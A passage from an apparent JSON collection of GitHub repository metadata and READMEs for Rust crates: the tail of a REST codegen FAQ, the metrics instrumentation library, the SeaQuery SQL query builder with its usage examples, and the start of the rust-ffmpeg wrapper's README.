\n\n## FAQ\n\n> Why is this generating raw Rust code instead of leveraging [procedural macros](https://doc.rust-lang.org/reference/procedural-macros.html) for compile-time codegen?\n\nI don't think proc macros are the right way to go for REST APIs. We need to be able to **see** the generated code somehow to identify names, fields, supported methods, etc. With proc macros, you sorta have to guess.\n\nThis doesn't mean you can't generate APIs in compile-time. The only difference is that you'll be using [build scripts](https://paperclip-rs.github.io/paperclip/build-script.html) instead and `include!` the relevant code. That said, [we're using proc-macros](./macros) for other things.\n\n> The error thrown at compile-time doesn't look like it's very useful. Isn't there a better way to do this?\n\nNone that I can think of, sadly.\n\n**New ideas are here needed.**\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "metrics-rs/metrics", "link": "https://github.com/metrics-rs/metrics", "tags": ["rust-lang", "metrics", "telemetry"], "stars": 694, "description": "A metrics ecosystem for Rust.", "lang": "Rust", "repo_lang": "", "readme": "![Metrics - High-performance, protocol-agnostic instrumentation][splash]\n\n[splash]: https://raw.githubusercontent.com/metrics-rs/metrics/main/assets/splash.png\n\n[![Code of Conduct][conduct-badge]][conduct]\n[![MIT licensed][license-badge]](#license)\n[![Documentation][docs-badge]][docs]\n[![Discord chat][discord-badge]][discord]\n![last-commit-badge][]\n![contributors-badge][]\n\n[conduct-badge]: https://img.shields.io/badge/%E2%9D%A4-code%20of%20conduct-blue.svg\n[conduct]: https://github.com/metrics-rs/metrics/blob/master/CODE_OF_CONDUCT.md\n[license-badge]: https://img.shields.io/badge/license-MIT-blue\n[docs-badge]: https://docs.rs/metrics/badge.svg\n[docs]: https://docs.rs/metrics\n[discord-badge]: https://img.shields.io/discord/500028886025895936\n[discord]: https://discord.gg/eTwKyY9\n[last-commit-badge]: https://img.shields.io/github/last-commit/metrics-rs/metrics\n[contributors-badge]: https://img.shields.io/github/contributors/metrics-rs/metrics\n\n\n## code of conduct\n\n**NOTE**: All conversations and contributions to this project shall adhere to the [Code of Conduct][conduct].\n\n# what's it all about?\n\nRunning applications in production can be hard when you don't have insight into what the application is doing. We're lucky to have so many good system monitoring programs and services to show us how our servers are performing, but we still have to do the work of instrumenting our applications to gain deep insight into their behavior and performance.\n\n`metrics` makes it easy to instrument your application to provide real-time insight into what's happening. It provides a number of practical features that make it easy for library and application authors to start collecting and exporting metrics from their codebase.\n\n# why would I collect metrics?\n\nSome of the most common scenarios for collecting metrics from an application:\n- see how many times a codepath was hit\n- track the time it takes for a piece of code to execute\n- expose internal counters and values in a standardized way\n\nImportantly, this works for both library authors and application authors. If the libraries you use are instrumented, you unlock the power of being able to collect those metrics in your application for free, without any extra configuration. Everyone wins, and learns more about their application performance at the end of the day.\n\n# project layout\n\nThe Metrics project provides a number of crates for both library and application authors.\n\nIf you're a library author, you'll only care about using [`metrics`][metrics] to instrument your library. If you're an application author, you'll likely also want to instrument your application, but you'll care about \"exporters\" as a means to take those metrics and ship them somewhere for analysis.\n\nOverall, this repository is home to the following crates:\n\n* [`metrics`][metrics]: A lightweight metrics facade, similar to [`log`][log].\n* [`metrics-macros`][metrics-macros]: Procedural macros that power `metrics`.\n* [`metrics-tracing-context`][metrics-tracing-context]: Allow capturing [`tracing`][tracing] span\n fields as metric labels.\n* [`metrics-exporter-tcp`][metrics-exporter-tcp]: A `metrics`-compatible exporter for serving metrics over TCP.\n* [`metrics-exporter-prometheus`][metrics-exporter-prometheus]: A `metrics`-compatible exporter for\n serving a Prometheus scrape endpoint.\n* [`metrics-util`][metrics-util]: Helper types/functions used by the `metrics` ecosystem.\n\n# community integrations\n\nAs well, there are also some community-maintained exporters and other integrations:\n\n* [`metrics-exporter-statsd`][metrics-exporter-statsd]: A `metrics`-compatible exporter for sending metrics via StatsD.\n* [`metrics-exporter-newrelic`][metrics-exporter-newrelic]: A `metrics`-compatible exporter for sending metrics to New Relic.\n* [`opinionated_metrics`][opinionated-metrics]: Opinionated interface to emitting metrics for CLi/server applications, based on `metrics`.\n\n## MSRV\n\nMinimum Supported Rust version is **1.56.1**.\nIt is enforced in CI.\n\n### policy for bumping MSRV\n\n* The last 4 stable releases must always be supported\n* Goal is to try and support older versions where possible (not opting in to newer versions just to use a new helper method on standard library types, etc)\n* Do not bump the MSRV for newer versions of dependencies in core crates (metrics and metrics-util)\n\n# contributing\n\nTo those of you who have already contributed to `metrics` in some way, shape, or form: **a big, and continued, \"thank you!\"** \u2764\ufe0f\n\nTo everyone else that we haven't had the pleasure of interacting with: we're always looking for thoughts on how to make `metrics` better, or users with interesting use cases. Of course, we're also happy to accept code contributions for outstanding feature requests directly. \ud83d\ude00\n\nWe'd love to chat about any of the above, or anything else related to metrics. Don't hesitate to file an issue on the repository, or come and chat with us over on [Discord](https://discord.gg/eTwKyY9).\n\n[metrics]: https://github.com/metrics-rs/metrics/tree/main/metrics\n[metrics-macros]: https://github.com/metrics-rs/metrics/tree/main/metrics-macros\n[metrics-tracing-context]: https://github.com/metrics-rs/metrics/tree/main/metrics-tracing-context\n[metrics-exporter-tcp]: https://github.com/metrics-rs/metrics/tree/main/metrics-exporter-tcp\n[metrics-exporter-prometheus]: https://github.com/metrics-rs/metrics/tree/main/metrics-exporter-prometheus\n[metrics-util]: https://github.com/metrics-rs/metrics/tree/main/metrics-util\n[log]: https://docs.rs/log\n[tracing]: https://tracing.rs\n[metrics-exporter-statsd]: https://docs.rs/metrics-exporter-statsd\n[metrics-exporter-newrelic]: https://docs.rs/metrics-exporter-newrelic\n[opinionated-metrics]: https://docs.rs/opinionated_metrics\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "SeaQL/sea-query", "link": "https://github.com/SeaQL/sea-query", "tags": ["rust", "query-builder", "mysql", "postgresql", "sqlite", "sql", "database", "mariadb", "postgres", "sqlx", "rusqlite", "hacktoberfest"], "stars": 694, "description": "\ud83d\udd31 A dynamic SQL query builder for MySQL, Postgres and SQLite", "lang": "Rust", "repo_lang": "", "readme": "
\n\n \"SeaQuery\n\n

\n \ud83d\udd31 A dynamic query builder for MySQL, Postgres and SQLite\n

\n\n [![crate](https://img.shields.io/crates/v/sea-query.svg)](https://crates.io/crates/sea-query)\n [![docs](https://docs.rs/sea-query/badge.svg)](https://docs.rs/sea-query)\n [![build status](https://github.com/SeaQL/sea-query/actions/workflows/rust.yml/badge.svg)](https://github.com/SeaQL/sea-query/actions/workflows/rust.yml)\n\n
\n\n## SeaQuery\n\nSeaQuery is a query builder to help you construct dynamic SQL queries in Rust.\nYou can construct expressions, queries and schema as abstract syntax trees using an ergonomic API.\nWe support MySQL, Postgres and SQLite behind a common interface that aligns their behaviour where appropriate.\n\nWe provide integration for [SQLx](https://crates.io/crates/sqlx),\n[postgres](https://crates.io/crates/postgres) and [rusqlite](https://crates.io/crates/rusqlite).\nSee [examples](https://github.com/SeaQL/sea-query/blob/master/examples) for usage.\n\nSeaQuery is the foundation of [SeaORM](https://github.com/SeaQL/sea-orm), an async & dynamic ORM for Rust.\n\n[![GitHub stars](https://img.shields.io/github/stars/SeaQL/sea-query.svg?style=social&label=Star&maxAge=1)](https://github.com/SeaQL/sea-query/stargazers/)\nIf you like what we do, consider starring, commenting, sharing and contributing!\n\n[![Discord](https://img.shields.io/discord/873880840487206962?label=Discord)](https://discord.com/invite/uCPdDXzbdv)\nJoin our Discord server to chat with others in the SeaQL community!\n\n## Install\n\n```toml\n# Cargo.toml\n[dependencies]\nsea-query = \"0\"\n```\n\nSeaQuery is very lightweight, all dependencies are optional.\n\n### Feature flags\n\nMacro: `derive` `attr`\n\nAsync support: `thread-safe` (use `Arc` inplace of `Rc`)\n\nSQL engine: `backend-mysql`, `backend-postgres`, `backend-sqlite`\n\nType support: `with-chrono`, `with-time`, `with-json`, `with-rust_decimal`, `with-bigdecimal`, `with-uuid`,\n`with-ipnetwork`, `with-mac_address`, `postgres-array`, `postgres-interval`\n\n## Usage\n\nTable of Content\n\n1. Basics\n\n 1. [Iden](#iden)\n 1. [Expression](#expression)\n 1. [Condition](#condition)\n 1. [Statement Builders](#statement-builders)\n\n1. Query Statement\n\n 1. [Query Select](#query-select)\n 1. [Query Insert](#query-insert)\n 1. [Query Update](#query-update)\n 1. [Query Delete](#query-delete)\n\n1. Advanced\n 1. [Aggregate Functions](#aggregate-functions)\n 1. [Casting](#casting)\n 1. [Custom Function](#custom-function)\n\n1. Schema Statement\n\n 1. [Table Create](#table-create)\n 1. [Table Alter](#table-alter)\n 1. [Table Drop](#table-drop)\n 1. [Table Rename](#table-rename)\n 1. [Table Truncate](#table-truncate)\n 1. [Foreign Key Create](#foreign-key-create)\n 1. [Foreign Key Drop](#foreign-key-drop)\n 1. [Index Create](#index-create)\n 1. [Index Drop](#index-drop)\n\n### Motivation\n\nWhy would you want to use a dynamic query builder?\n\n1. Parameter bindings\n\nOne of the headaches when using raw SQL is parameter binding. With SeaQuery you can:\n\n```rust\nassert_eq!(\n Query::select()\n .column(Glyph::Image)\n .from(Glyph::Table)\n .and_where(Expr::col(Glyph::Image).like(\"A\"))\n .and_where(Expr::col(Glyph::Id).is_in([1, 2, 3]))\n .build(PostgresQueryBuilder),\n (\n r#\"SELECT \"image\" FROM \"glyph\" WHERE \"image\" LIKE $1 AND \"id\" IN ($2, $3, $4)\"#\n .to_owned(),\n Values(vec![\n Value::String(Some(Box::new(\"A\".to_owned()))),\n Value::Int(Some(1)),\n Value::Int(Some(2)),\n Value::Int(Some(3))\n ])\n )\n);\n```\n\n2. Dynamic query\n\nYou can construct the query at runtime based on user inputs:\n\n```rust\nQuery::select()\n .column(Char::Character)\n .from(Char::Table)\n .conditions(\n // some runtime condition\n true,\n // if condition is true then add the following condition\n |q| {\n q.and_where(Expr::col(Char::Id).eq(1));\n },\n // otherwise leave it as is\n |q| {},\n );\n```\n\n### Iden\n\n`Iden` is a trait for identifiers used in any query statement.\n\nCommonly implemented by Enum where each Enum represents a table found in a database,\nand its variants include table name and column name.\n\n[`Iden::unquoted()`] must be implemented to provide a mapping between Enum variants and its\ncorresponding string value.\n\n```rust\nuse sea_query::*;\n\n// For example Character table with column id, character, font_size...\npub enum Character {\n Table,\n Id,\n FontId,\n FontSize,\n}\n\n// Mapping between Enum variant and its corresponding string value\nimpl Iden for Character {\n fn unquoted(&self, s: &mut dyn std::fmt::Write) {\n write!(\n s,\n \"{}\",\n match self {\n Self::Table => \"character\",\n Self::Id => \"id\",\n Self::FontId => \"font_id\",\n Self::FontSize => \"font_size\",\n }\n )\n .unwrap();\n }\n}\n```\n\nIf you're okay with running another procedural macro, you can activate\nthe `derive` or `attr` feature on the crate to save you some boilerplate.\nFor more usage information, look at\n[the derive examples](https://github.com/SeaQL/sea-query/tree/master/sea-query-derive/tests/pass)\nor [the attribute examples](https://github.com/SeaQL/sea-query/tree/master/sea-query-attr/tests/pass).\n\n```rust\n#[cfg(feature = \"derive\")]\nuse sea_query::Iden;\n\n// This will implement Iden exactly as shown above\n#[derive(Iden)]\nenum Character {\n Table,\n}\nassert_eq!(Character::Table.to_string(), \"character\");\n\n// You can also derive a unit struct\n#[derive(Iden)]\nstruct Glyph;\nassert_eq!(Glyph.to_string(), \"glyph\");\n```\n\n```rust\n#[cfg(feature = \"attr\")]\nuse sea_query::{enum_def, Iden};\n\n#[enum_def]\nstruct Character {\n pub foo: u64,\n}\n\n// It generates the following along with Iden impl\nenum CharacterIden {\n Table,\n Foo,\n}\n\nassert_eq!(CharacterIden::Table.to_string(), \"character\");\nassert_eq!(CharacterIden::Foo.to_string(), \"foo\");\n```\n\n\n### Expression\n\nUse [`Expr`] to construct select, join, where and having expression in query.\n\n```rust\nassert_eq!(\n Query::select()\n .column(Char::Character)\n .from(Char::Table)\n .and_where(\n Expr::expr(Expr::col(Char::SizeW).add(1))\n .mul(2)\n .eq(Expr::expr(Expr::col(Char::SizeH).div(2)).sub(1))\n )\n .and_where(\n Expr::col(Char::SizeW).in_subquery(\n Query::select()\n .expr(Expr::cust_with_values(\"ln($1 ^ $2)\", [2.4, 1.2]))\n .take()\n )\n )\n .and_where(\n Expr::col(Char::Character)\n .like(\"D\")\n .and(Expr::col(Char::Character).like(\"E\"))\n )\n .to_string(PostgresQueryBuilder),\n [\n r#\"SELECT \"character\" FROM \"character\"\"#,\n r#\"WHERE (\"size_w\" + 1) * 2 = (\"size_h\" / 2) - 1\"#,\n r#\"AND \"size_w\" IN (SELECT ln(2.4 ^ 1.2))\"#,\n r#\"AND ((\"character\" LIKE 'D') AND (\"character\" LIKE 'E'))\"#,\n ]\n .join(\" \")\n);\n```\n\n### Condition\n\nIf you have complex conditions to express, you can use the [`Condition`] builder,\nusable for [`ConditionalStatement::cond_where`] and [`SelectStatement::cond_having`].\n\n```rust\nassert_eq!(\n Query::select()\n .column(Glyph::Id)\n .from(Glyph::Table)\n .cond_where(\n Cond::any()\n .add(\n Cond::all()\n .add(Expr::col(Glyph::Aspect).is_null())\n .add(Expr::col(Glyph::Image).is_null())\n )\n .add(\n Cond::all()\n .add(Expr::col(Glyph::Aspect).is_in([3, 4]))\n .add(Expr::col(Glyph::Image).like(\"A%\"))\n )\n )\n .to_string(PostgresQueryBuilder),\n [\n r#\"SELECT \"id\" FROM \"glyph\"\"#,\n r#\"WHERE\"#,\n r#\"(\"aspect\" IS NULL AND \"image\" IS NULL)\"#,\n r#\"OR\"#,\n r#\"(\"aspect\" IN (3, 4) AND \"image\" LIKE 'A%')\"#,\n ]\n .join(\" \")\n);\n```\n\nThere is also the [`any!`] and [`all!`] macro at your convenience:\n\n```rust\nQuery::select().cond_where(any![\n Expr::col(Glyph::Aspect).is_in([3, 4]),\n all![\n Expr::col(Glyph::Aspect).is_null(),\n Expr::col(Glyph::Image).like(\"A%\")\n ]\n]);\n```\n\n### Statement Builders\n\nStatements are divided into 2 categories: Query and Schema, and to be serialized into SQL\nwith [`QueryStatementBuilder`] and [`SchemaStatementBuilder`] respectively.\n\nSchema statement has the following interface:\n\n```rust\nfn build(&self, schema_builder: T) -> String;\n```\n\nQuery statement has the following interfaces:\n\n```rust\nfn build(&self, query_builder: T) -> (String, Values);\n\nfn to_string(&self, query_builder: T) -> String;\n```\n\n`build` builds a SQL statement as string and parameters to be passed to the database driver\nthrough the binary protocol. This is the preferred way as it has less overhead and is more secure.\n\n`to_string` builds a SQL statement as string with parameters injected. This is good for testing\nand debugging.\n\n### Query Select\n\n```rust\nlet query = Query::select()\n .column(Char::Character)\n .column((Font::Table, Font::Name))\n .from(Char::Table)\n .left_join(Font::Table, Expr::col((Char::Table, Char::FontId)).equals((Font::Table, Font::Id)))\n .and_where(Expr::col(Char::SizeW).is_in([3, 4]))\n .and_where(Expr::col(Char::Character).like(\"A%\"))\n .to_owned();\n\nassert_eq!(\n query.to_string(MysqlQueryBuilder),\n r#\"SELECT `character`, `font`.`name` FROM `character` LEFT JOIN `font` ON `character`.`font_id` = `font`.`id` WHERE `size_w` IN (3, 4) AND `character` LIKE 'A%'\"#\n);\nassert_eq!(\n query.to_string(PostgresQueryBuilder),\n r#\"SELECT \"character\", \"font\".\"name\" FROM \"character\" LEFT JOIN \"font\" ON \"character\".\"font_id\" = \"font\".\"id\" WHERE \"size_w\" IN (3, 4) AND \"character\" LIKE 'A%'\"#\n);\nassert_eq!(\n query.to_string(SqliteQueryBuilder),\n r#\"SELECT \"character\", \"font\".\"name\" FROM \"character\" LEFT JOIN \"font\" ON \"character\".\"font_id\" = \"font\".\"id\" WHERE \"size_w\" IN (3, 4) AND \"character\" LIKE 'A%'\"#\n);\n```\n\n### Query Insert\n\n```rust\nlet query = Query::insert()\n .into_table(Glyph::Table)\n .columns([Glyph::Aspect, Glyph::Image])\n .values_panic([5.15.into(), \"12A\".into()])\n .values_panic([4.21.into(), \"123\".into()])\n .to_owned();\n\nassert_eq!(\n query.to_string(MysqlQueryBuilder),\n r#\"INSERT INTO `glyph` (`aspect`, `image`) VALUES (5.15, '12A'), (4.21, '123')\"#\n);\nassert_eq!(\n query.to_string(PostgresQueryBuilder),\n r#\"INSERT INTO \"glyph\" (\"aspect\", \"image\") VALUES (5.15, '12A'), (4.21, '123')\"#\n);\nassert_eq!(\n query.to_string(SqliteQueryBuilder),\n r#\"INSERT INTO \"glyph\" (\"aspect\", \"image\") VALUES (5.15, '12A'), (4.21, '123')\"#\n);\n```\n\n### Query Update\n\n```rust\nlet query = Query::update()\n .table(Glyph::Table)\n .values([(Glyph::Aspect, 1.23.into()), (Glyph::Image, \"123\".into())])\n .and_where(Expr::col(Glyph::Id).eq(1))\n .to_owned();\n\nassert_eq!(\n query.to_string(MysqlQueryBuilder),\n r#\"UPDATE `glyph` SET `aspect` = 1.23, `image` = '123' WHERE `id` = 1\"#\n);\nassert_eq!(\n query.to_string(PostgresQueryBuilder),\n r#\"UPDATE \"glyph\" SET \"aspect\" = 1.23, \"image\" = '123' WHERE \"id\" = 1\"#\n);\nassert_eq!(\n query.to_string(SqliteQueryBuilder),\n r#\"UPDATE \"glyph\" SET \"aspect\" = 1.23, \"image\" = '123' WHERE \"id\" = 1\"#\n);\n```\n\n### Query Delete\n\n```rust\nlet query = Query::delete()\n .from_table(Glyph::Table)\n .cond_where(\n Cond::any()\n .add(Expr::col(Glyph::Id).lt(1))\n .add(Expr::col(Glyph::Id).gt(10)),\n )\n .to_owned();\n\nassert_eq!(\n query.to_string(MysqlQueryBuilder),\n r#\"DELETE FROM `glyph` WHERE `id` < 1 OR `id` > 10\"#\n);\nassert_eq!(\n query.to_string(PostgresQueryBuilder),\n r#\"DELETE FROM \"glyph\" WHERE \"id\" < 1 OR \"id\" > 10\"#\n);\nassert_eq!(\n query.to_string(SqliteQueryBuilder),\n r#\"DELETE FROM \"glyph\" WHERE \"id\" < 1 OR \"id\" > 10\"#\n);\n```\n\n### Aggregate Functions\n\n`max`, `min`, `sum`, `avg`, `count` etc\n\n```rust\nlet query = Query::select()\n .expr(Func::sum(Expr::col((Char::Table, Char::SizeH))))\n .from(Char::Table)\n .to_owned();\nassert_eq!(\n query.to_string(MysqlQueryBuilder),\n r#\"SELECT SUM(`character`.`size_h`) FROM `character`\"#\n);\nassert_eq!(\n query.to_string(PostgresQueryBuilder),\n r#\"SELECT SUM(\"character\".\"size_h\") FROM \"character\"\"#\n);\nassert_eq!(\n query.to_string(SqliteQueryBuilder),\n r#\"SELECT SUM(\"character\".\"size_h\") FROM \"character\"\"#\n);\n```\n\n### Casting\n\n```rust\nlet query = Query::select()\n .expr(Func::cast_as(\"hello\", Alias::new(\"MyType\")))\n .to_owned();\n\nassert_eq!(\n query.to_string(MysqlQueryBuilder),\n r#\"SELECT CAST('hello' AS MyType)\"#\n);\nassert_eq!(\n query.to_string(PostgresQueryBuilder),\n r#\"SELECT CAST('hello' AS MyType)\"#\n);\nassert_eq!(\n query.to_string(SqliteQueryBuilder),\n r#\"SELECT CAST('hello' AS MyType)\"#\n);\n```\n\n### Custom Function\n\n```rust\nstruct MyFunction;\n\nimpl Iden for MyFunction {\n fn unquoted(&self, s: &mut dyn Write) {\n write!(s, \"MY_FUNCTION\").unwrap();\n }\n}\n\nlet query = Query::select()\n .expr(Func::cust(MyFunction).arg(Expr::val(\"hello\")))\n .to_owned();\n\nassert_eq!(\n query.to_string(MysqlQueryBuilder),\n r#\"SELECT MY_FUNCTION('hello')\"#\n);\nassert_eq!(\n query.to_string(PostgresQueryBuilder),\n r#\"SELECT MY_FUNCTION('hello')\"#\n);\nassert_eq!(\n query.to_string(SqliteQueryBuilder),\n r#\"SELECT MY_FUNCTION('hello')\"#\n);\n```\n\n### Table Create\n\n```rust\nlet table = Table::create()\n .table(Char::Table)\n .if_not_exists()\n .col(ColumnDef::new(Char::Id).integer().not_null().auto_increment().primary_key())\n .col(ColumnDef::new(Char::FontSize).integer().not_null())\n .col(ColumnDef::new(Char::Character).string().not_null())\n .col(ColumnDef::new(Char::SizeW).integer().not_null())\n .col(ColumnDef::new(Char::SizeH).integer().not_null())\n .col(ColumnDef::new(Char::FontId).integer().default(Value::Int(None)))\n .foreign_key(\n ForeignKey::create()\n .name(\"FK_2e303c3a712662f1fc2a4d0aad6\")\n .from(Char::Table, Char::FontId)\n .to(Font::Table, Font::Id)\n .on_delete(ForeignKeyAction::Cascade)\n .on_update(ForeignKeyAction::Cascade)\n )\n .to_owned();\n\nassert_eq!(\n table.to_string(MysqlQueryBuilder),\n [\n r#\"CREATE TABLE IF NOT EXISTS `character` (\"#,\n r#\"`id` int NOT NULL AUTO_INCREMENT PRIMARY KEY,\"#,\n r#\"`font_size` int NOT NULL,\"#,\n r#\"`character` varchar(255) NOT NULL,\"#,\n r#\"`size_w` int NOT NULL,\"#,\n r#\"`size_h` int NOT NULL,\"#,\n r#\"`font_id` int DEFAULT NULL,\"#,\n r#\"CONSTRAINT `FK_2e303c3a712662f1fc2a4d0aad6`\"#,\n r#\"FOREIGN KEY (`font_id`) REFERENCES `font` (`id`)\"#,\n r#\"ON DELETE CASCADE ON UPDATE CASCADE\"#,\n r#\")\"#,\n ].join(\" \")\n);\nassert_eq!(\n table.to_string(PostgresQueryBuilder),\n [\n r#\"CREATE TABLE IF NOT EXISTS \"character\" (\"#,\n r#\"\"id\" serial NOT NULL PRIMARY KEY,\"#,\n r#\"\"font_size\" integer NOT NULL,\"#,\n r#\"\"character\" varchar NOT NULL,\"#,\n r#\"\"size_w\" integer NOT NULL,\"#,\n r#\"\"size_h\" integer NOT NULL,\"#,\n r#\"\"font_id\" integer DEFAULT NULL,\"#,\n r#\"CONSTRAINT \"FK_2e303c3a712662f1fc2a4d0aad6\"\"#,\n r#\"FOREIGN KEY (\"font_id\") REFERENCES \"font\" (\"id\")\"#,\n r#\"ON DELETE CASCADE ON UPDATE CASCADE\"#,\n r#\")\"#,\n ].join(\" \")\n);\nassert_eq!(\n table.to_string(SqliteQueryBuilder),\n [\n r#\"CREATE TABLE IF NOT EXISTS \"character\" (\"#,\n r#\"\"id\" integer NOT NULL PRIMARY KEY AUTOINCREMENT,\"#,\n r#\"\"font_size\" integer NOT NULL,\"#,\n r#\"\"character\" text NOT NULL,\"#,\n r#\"\"size_w\" integer NOT NULL,\"#,\n r#\"\"size_h\" integer NOT NULL,\"#,\n r#\"\"font_id\" integer DEFAULT NULL,\"#,\n r#\"FOREIGN KEY (\"font_id\") REFERENCES \"font\" (\"id\") ON DELETE CASCADE ON UPDATE CASCADE\"#,\n r#\")\"#,\n ].join(\" \")\n);\n```\n\n### Table Alter\n\n```rust\nlet table = Table::alter()\n .table(Font::Table)\n .add_column(\n ColumnDef::new(Alias::new(\"new_col\"))\n .integer()\n .not_null()\n .default(100),\n )\n .to_owned();\n\nassert_eq!(\n table.to_string(MysqlQueryBuilder),\n r#\"ALTER TABLE `font` ADD COLUMN `new_col` int NOT NULL DEFAULT 100\"#\n);\nassert_eq!(\n table.to_string(PostgresQueryBuilder),\n r#\"ALTER TABLE \"font\" ADD COLUMN \"new_col\" integer NOT NULL DEFAULT 100\"#\n);\nassert_eq!(\n table.to_string(SqliteQueryBuilder),\n r#\"ALTER TABLE \"font\" ADD COLUMN \"new_col\" integer NOT NULL DEFAULT 100\"#,\n);\n```\n\n### Table Drop\n\n```rust\nlet table = Table::drop()\n .table(Glyph::Table)\n .table(Char::Table)\n .to_owned();\n\nassert_eq!(\n table.to_string(MysqlQueryBuilder),\n r#\"DROP TABLE `glyph`, `character`\"#\n);\nassert_eq!(\n table.to_string(PostgresQueryBuilder),\n r#\"DROP TABLE \"glyph\", \"character\"\"#\n);\nassert_eq!(\n table.to_string(SqliteQueryBuilder),\n r#\"DROP TABLE \"glyph\", \"character\"\"#\n);\n```\n\n### Table Rename\n\n```rust\nlet table = Table::rename()\n .table(Font::Table, Alias::new(\"font_new\"))\n .to_owned();\n\nassert_eq!(\n table.to_string(MysqlQueryBuilder),\n r#\"RENAME TABLE `font` TO `font_new`\"#\n);\nassert_eq!(\n table.to_string(PostgresQueryBuilder),\n r#\"ALTER TABLE \"font\" RENAME TO \"font_new\"\"#\n);\nassert_eq!(\n table.to_string(SqliteQueryBuilder),\n r#\"ALTER TABLE \"font\" RENAME TO \"font_new\"\"#\n);\n```\n\n### Table Truncate\n\n```rust\nlet table = Table::truncate().table(Font::Table).to_owned();\n\nassert_eq!(\n table.to_string(MysqlQueryBuilder),\n r#\"TRUNCATE TABLE `font`\"#\n);\nassert_eq!(\n table.to_string(PostgresQueryBuilder),\n r#\"TRUNCATE TABLE \"font\"\"#\n);\n// Sqlite does not support the TRUNCATE statement\n```\n\n### Foreign Key Create\n\n```rust\nlet foreign_key = ForeignKey::create()\n .name(\"FK_character_font\")\n .from(Char::Table, Char::FontId)\n .to(Font::Table, Font::Id)\n .on_delete(ForeignKeyAction::Cascade)\n .on_update(ForeignKeyAction::Cascade)\n .to_owned();\n\nassert_eq!(\n foreign_key.to_string(MysqlQueryBuilder),\n [\n r#\"ALTER TABLE `character`\"#,\n r#\"ADD CONSTRAINT `FK_character_font`\"#,\n r#\"FOREIGN KEY (`font_id`) REFERENCES `font` (`id`)\"#,\n r#\"ON DELETE CASCADE ON UPDATE CASCADE\"#,\n ]\n .join(\" \")\n);\nassert_eq!(\n foreign_key.to_string(PostgresQueryBuilder),\n [\n r#\"ALTER TABLE \"character\" ADD CONSTRAINT \"FK_character_font\"\"#,\n r#\"FOREIGN KEY (\"font_id\") REFERENCES \"font\" (\"id\")\"#,\n r#\"ON DELETE CASCADE ON UPDATE CASCADE\"#,\n ]\n .join(\" \")\n);\n// Sqlite does not support modification of foreign key constraints to existing tables\n```\n\n### Foreign Key Drop\n\n```rust\nlet foreign_key = ForeignKey::drop()\n .name(\"FK_character_font\")\n .table(Char::Table)\n .to_owned();\n\nassert_eq!(\n foreign_key.to_string(MysqlQueryBuilder),\n r#\"ALTER TABLE `character` DROP FOREIGN KEY `FK_character_font`\"#\n);\nassert_eq!(\n foreign_key.to_string(PostgresQueryBuilder),\n r#\"ALTER TABLE \"character\" DROP CONSTRAINT \"FK_character_font\"\"#\n);\n// Sqlite does not support modification of foreign key constraints to existing tables\n```\n\n### Index Create\n\n```rust\nlet index = Index::create()\n .name(\"idx-glyph-aspect\")\n .table(Glyph::Table)\n .col(Glyph::Aspect)\n .to_owned();\n\nassert_eq!(\n index.to_string(MysqlQueryBuilder),\n r#\"CREATE INDEX `idx-glyph-aspect` ON `glyph` (`aspect`)\"#\n);\nassert_eq!(\n index.to_string(PostgresQueryBuilder),\n r#\"CREATE INDEX \"idx-glyph-aspect\" ON \"glyph\" (\"aspect\")\"#\n);\nassert_eq!(\n index.to_string(SqliteQueryBuilder),\n r#\"CREATE INDEX \"idx-glyph-aspect\" ON \"glyph\" (\"aspect\")\"#\n);\n```\n\n### Index Drop\n\n```rust\nlet index = Index::drop()\n .name(\"idx-glyph-aspect\")\n .table(Glyph::Table)\n .to_owned();\n\nassert_eq!(\n index.to_string(MysqlQueryBuilder),\n r#\"DROP INDEX `idx-glyph-aspect` ON `glyph`\"#\n);\nassert_eq!(\n index.to_string(PostgresQueryBuilder),\n r#\"DROP INDEX \"idx-glyph-aspect\"\"#\n);\nassert_eq!(\n index.to_string(SqliteQueryBuilder),\n r#\"DROP INDEX \"idx-glyph-aspect\"\"#\n);\n```\n\n## License\n\nLicensed under either of\n\n- Apache License, Version 2.0\n ([LICENSE-APACHE](LICENSE-APACHE) or )\n- MIT license\n ([LICENSE-MIT](LICENSE-MIT) or )\n\nat your option.\n\n## Contribution\n\nUnless you explicitly state otherwise, any contribution intentionally submitted\nfor inclusion in the work by you, as defined in the Apache-2.0 license, shall be\ndual licensed as above, without any additional terms or conditions.\n\nSeaQuery is a community driven project. We welcome you to participate, contribute and together build for Rust's future.\n\nA big shout out to our contributors:\n\n[![Contributors](https://opencollective.com/sea-query/contributors.svg?width=1000&button=false)](https://github.com/SeaQL/sea-query/graphs/contributors)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "zmwangx/rust-ffmpeg", "link": "https://github.com/zmwangx/rust-ffmpeg", "tags": [], "stars": 693, "description": "Safe FFmpeg wrapper.", "lang": "Rust", "repo_lang": "", "readme": "[![crates.io](https://img.shields.io/crates/v/ffmpeg-next.svg)](https://crates.io/crates/ffmpeg-next)\n[![docs.rs](https://docs.rs/ffmpeg-next/badge.svg)](https://docs.rs/ffmpeg-next/)\n[![build](https://github.com/zmwangx/rust-ffmpeg/workflows/build/badge.svg)](https://github.com/zmwangx/rust-ffmpeg/actions)\n\nThis is a fork of the abandoned [ffmpeg](https://crates.io/crates/ffmpeg) crate by [meh.](https://github.com/meh/rust-ffmpeg).\n\nCurrently supported FFmpeg versions: 3.4.x through 4.4.x.\n\nBuild instructions can be found on the [wiki](https://github.com/zmwangx/rust-ffmpeg/wiki/Notes-on-building).\n\nDocumentation:\n\n- [docs.rs](https://docs.rs/ffmpeg-next/);\n- [FFmpeg user manual](https://ffmpeg.org/ffmpeg-all.html);\n- [FFmpeg Doxygen](https://ffmpeg.org/doxygen/trunk/).\n\n*Note on upgrading to v4.3.4 or later: v4.3.4 introduced automatic FFmpeg version detection, obsoleting feature flags `ffmpeg4`, `ffmpeg41`, `ffmpeg42` and `ffmpeg43`. If you manually specify any of these features, now is the time to remove them; if you use `ffmpeg43` through the `default` feature, it's still on for backward-compatibility but it has turned into a no-op, and you don't need to do anything. Deprecation plan: `ffmpeg43` will be dropped from default features come 4.4, and all these features will be removed come 5.0.*\n\n*See [CHANGELOG.md](CHANGELOG.md) for other information on version upgrades.*\n\nA word on versioning: major and minor versions of this crate track major and minor versions of FFmpeg, e.g. 4.2.x of this crate has been updated to support the 4.2.x series of FFmpeg. Patch level is reserved for changes to this crate and does not track FFmpeg patch versions. 